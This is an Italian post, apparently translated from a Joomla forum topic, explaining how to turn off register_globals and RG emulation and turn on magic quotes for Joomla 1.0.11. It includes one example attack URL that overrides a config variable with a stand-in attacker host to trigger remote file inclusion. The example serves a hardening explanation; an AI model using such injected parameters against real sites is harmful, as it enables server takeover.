A causa delle modifiche che sto apportando al forge, avrete notato che il link alla pagina riguardante i messaggi di sicurezza (molto visitata devo dire), non è più disponibile.
Vi riporto qui temporaneamente il contenuto della pagina
In Joomla 1.0.11 sono stati introdotti 3 nuovi avvisi per consentire un'installazione in maggiore sicurezza.
Register Globals
Cosa fa?
La funzione register_globals aiuta gli sviluppatori nella creazione di componenti. Essa infatti permette a tutti i valori che sono processati dallo script e li mette in variabili. Significa che
index.php?foo=bar
crea automaticamente la variabile $foo con il valore bar nello script index.php
Perchè è un rischio? Principalmente perchè la funzione non controlla il valore. Così se vuoi sovrascrivere il path di Joomla usato per includere files, lo permette
index.php?mos_config_livesite=http://bad.hacker.tld
Ora l'index.php proverà ad includere questo file e caricherà un file dal server. Con questo script, l'intruso avrà accesso al tuo server.
La funzione da sola non è un problema. Se controlli ogni variabile prima di usarne il contenuto, sei praticamente al sicuro, e ti aiuta (se sei uno sviluppatore). In Joomla questo è semplice. Per gli sviluppatori c'è una funzione chiamata mosGetParam(), che compie tutti i controlli per te ed è veramente semplice da usare. Se tutti gli sviluppatori usano questa funzione e non il register_globals, abbiamo veramente pochi problemi di sicurezza
Come posso mettere il register_globals Off?
Configurazione di Apache/Php
Se hai accesso al file di configurazione del tuo server puoi scrivere
register_globals = Off
Devi avere un po di esperienza, o rischi che il server non risponda più
file .htaccess
In molti server, puoi configurare apache tramite i file .htaccess Questi file non possono essere letti dal web!
Per creare questo file puoi creare un documento con blocco note o linux (non Word !) e inserire la linea
php_flag register_globals off
Se lo salvi nella cartella del tuo Joomla, metterai il tuo register_globals a off eliminando i rischi per la sicurezza
php.ini
Quando il file .htaccess non è accessibile, puoi usare il file php.ini
La linea da inseirire o modificare è la seguente
register_globals = off
Una soluzione potrebbe essere quella di creare un file php.ini da mettere in tutte le cartelle o modificare il file php.ini del server.
Se non hai accesso al php.ini devi richiedere al tuo provider di hosting se può metterti il register_globals a off.
Se si rifiuta, è consigliabile cambiare hosting, in quanto si tratta di una forma di sicurezza basilare utilizzata da molti anni
Magic Quotes
Cosa fa?
Aggiungono un addslashes automatico sui caratteri considerati pericolosi relativi a tutte le stringhe passate via GET e POST e su quanto salvato nei cookies.
Come posso attivarlo?
In pratica è com per il register_globals solo che nel .htaccess si dovrà aggiungere
php_flag magic_quotes_gpc on
mentre nel php.ini si dovrà aggiungere
magic_quotes_gpc = on
Emulazione RG
Cos'è?
L'emulazione RG è appunto un'emulazione del register_globals, e permette di risolvere molti problemi di sicurezza di quest'ultimo, permettendo ad alcune applicazioni di funzionare anche se il register_globals è su off.
Purtroppo questa emulazione non risolve tutti i problemi di sicurezza, ed è consigliabile portarla a OFF.
Come porto l'emulazione RG a Off?
Devi aprire il file globals.php nella cartella principale del tuo Joomla, e individua la linea
define( 'RG_EMULATION', 1 );
che dovrai sostituire con
define( 'RG_EMULATION', 0 );
traduzione di
http://forum.joomla.org/index.php/topic,93640.0.html
